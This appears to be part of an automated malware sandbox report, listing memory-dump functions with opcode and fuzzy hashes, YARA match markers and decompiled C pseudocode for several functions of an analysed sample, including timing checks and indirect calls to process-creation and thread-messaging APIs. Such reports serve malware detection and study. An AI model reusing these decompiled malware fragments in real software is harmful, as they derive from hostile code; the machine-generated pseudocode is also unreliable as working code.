                                                                                                                                                    • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                    • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00C5FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                    • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                                                                                                    • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                    • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00C5FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                    • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                                                                                                                    • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                    • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00C5FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                    • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                                                                                                    • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                    • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00C5FC90, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                                                                                    • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                                                                                                                    • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                                                                                    • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00C5FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                    • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                                                                                                                    • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                    • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00C5FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                    • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                                                                                                    • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                    • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00C5FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                    • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                                                                                                                    • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                    • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00C5FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                    • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                                                                                                    • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                    • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00C5FEA0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                                                                                                    • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                                                                                                                    • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                                                                                                    • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00C607AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                                                                    • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                                                                                                                    • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                                                                    • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00C5FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                    • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                                                                                                    • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                    • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004088B0, Relevance: .1, Instructions: 92COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                    			E004088B0(intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t28;
				void* _t35;
				void* _t37;
				void* _t38;
				intOrPtr _t42;
				intOrPtr _t43;
				char* _t52;
				void* _t54;
				intOrPtr _t56;
				void* _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				void* _t61;

				_t56 = _a4;
				_t43 = 0; // executed
				_t28 = E00406E00(_t56,  &_v24); // executed
				_t59 = _t58 + 8;
				if(_t28 != 0) {
					E00407010( &_v24,  &_v840);
					_t60 = _t59 + 8;
					do {
						E00419CD0( &_v284, 0x104);
						E0041A340( &_v284,  &_v804);
						_t61 = _t60 + 0x10;
						_t54 = 0x4f;
						while(1) {
							_t35 = E00413DD0(E00413D70(_t56, _t54),  &_v284);
							_t61 = _t61 + 0x10;
							if(_t35 != 0) {
								break;
							}
							_t54 = _t54 + 1;
							if(_t54 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t56 + 0x14; // 0xffffe1a5
						 *(_t56 + 0x474) =  *(_t56 + 0x474) ^  *_t9;
						_t43 = 1;
						L8:
						_t52 =  &_v840;
						_t37 = E00407040( &_v24, _t52);
						_t60 = _t61 + 8;
					} while (_t37 != 0 && _t43 == 0);
					_t38 = E004070C0(_t56,  &_v24); // executed
					if(_t43 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_t42 = _t38 - 0 + _t38;
						_v8 = _t42;
						 *((intOrPtr*)(_t56 + 0x55c)) =  *((intOrPtr*)(_t56 + 0x55c)) + 0xffffffba;
						_t18 = _t57 + _t42;
						_t19 = _t43;
						_t43 =  *_t18;
						 *_t18 = _t19;
						 *((intOrPtr*)(_t52 - 0x75cea200)) =  *((intOrPtr*)(_t52 - 0x75cea200)) + _t43;
					}
					 *((intOrPtr*)(_t56 + 0x31)) =  *((intOrPtr*)(_t56 + 0x31)) + _t43;
					_t24 = _t56 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t56 + 0x32)) =  *((intOrPtr*)(_t56 + 0x32)) +  *_t24 + 1;
					return 1;
				} else {
					return _t28;
				}
			}






















                                                                                                                                                    0x004088bb
                                                                                                                                                    0x004088c3
                                                                                                                                                    0x004088c5
                                                                                                                                                    0x004088ca
                                                                                                                                                    0x004088cf
                                                                                                                                                    0x004088e2
                                                                                                                                                    0x004088e7
                                                                                                                                                    0x004088f0
                                                                                                                                                    0x004088fc
                                                                                                                                                    0x0040890f
                                                                                                                                                    0x00408914
                                                                                                                                                    0x00408917
                                                                                                                                                    0x00408920
                                                                                                                                                    0x00408932
                                                                                                                                                    0x00408937
                                                                                                                                                    0x0040893c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040893e
                                                                                                                                                    0x00408942
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00408944
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00408942
                                                                                                                                                    0x00408946
                                                                                                                                                    0x00408949
                                                                                                                                                    0x0040894f
                                                                                                                                                    0x00408951
                                                                                                                                                    0x00408951
                                                                                                                                                    0x0040895c
                                                                                                                                                    0x00408961
                                                                                                                                                    0x00408964
                                                                                                                                                    0x00408971
                                                                                                                                                    0x0040897c
                                                                                                                                                    0x0040897e
                                                                                                                                                    0x00408984
                                                                                                                                                    0x00408986
                                                                                                                                                    0x00408988
                                                                                                                                                    0x0040898b
                                                                                                                                                    0x0040898c
                                                                                                                                                    0x0040898c
                                                                                                                                                    0x0040898c
                                                                                                                                                    0x0040898c
                                                                                                                                                    0x00408990
                                                                                                                                                    0x00408990
                                                                                                                                                    0x00408992
                                                                                                                                                    0x00408995
                                                                                                                                                    0x0040899a
                                                                                                                                                    0x004089a7
                                                                                                                                                    0x004088d6
                                                                                                                                                    0x004088d6
                                                                                                                                                    0x004088d6

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                                                                                                    • Instruction ID: aa626ceb7ef0a3bcdbf1efb1d9dc2f5a7bb3811b4857f0e914c6161f28eec10c
                                                                                                                                                    • Opcode Fuzzy Hash: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                                                                                                    • Instruction Fuzzy Hash: FE213AB3D402085BDB10E6649D42BFF73AC9B50304F44057FF989A3182F638BB4987A6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                    			E00407260(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E00419D20( &_v67, 0, 0x3f);
				E0041A900( &_v68, 3);
				_t12 = E00409B20(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E30(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409280(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                                                                                                                                    0x00407260
                                                                                                                                                    0x0040726f
                                                                                                                                                    0x00407273
                                                                                                                                                    0x0040727e
                                                                                                                                                    0x0040728e
                                                                                                                                                    0x0040729e
                                                                                                                                                    0x004072a3
                                                                                                                                                    0x004072aa
                                                                                                                                                    0x004072ad
                                                                                                                                                    0x004072ba
                                                                                                                                                    0x004072bc
                                                                                                                                                    0x004072be
                                                                                                                                                    0x004072db
                                                                                                                                                    0x004072db
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004072dd
                                                                                                                                                    0x004072e2

                                                                                                                                                    APIs
                                                                                                                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessagePostThread
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1836367815-0
                                                                                                                                                    • Opcode ID: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                                                                                                    • Instruction ID: bbcd0b2e5740072d15388175686a93538b06234ac68ffc2b081785cbfc84dfa6
                                                                                                                                                    • Opcode Fuzzy Hash: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                                                                                                    • Instruction Fuzzy Hash: 2B01D431A8022876E720A6959C03FFF772C9B00B54F05405EFF04BA1C2E6A87D0682EA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00418540, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                    			E00418540(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52) {
				void* _t22;
				void* _t33;
				intOrPtr* _t34;

				_t16 = _a4;
				_t34 = _a4 + 0xc80;
				E00418DC0(_t33, _t16, _t34,  *((intOrPtr*)(_t16 + 0xa14)), 0, 0x37);
				_t22 =  *((intOrPtr*)( *_t34))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48, _a52); // executed
				return _t22;
			}






                                                                                                                                                    0x00418543
                                                                                                                                                    0x00418552
                                                                                                                                                    0x0041855a
                                                                                                                                                    0x00418594
                                                                                                                                                    0x00418598

                                                                                                                                                    APIs
                                                                                                                                                    • CreateProcessInternalW.KERNEL32(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,y@,?,?,?), ref: 00418594
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
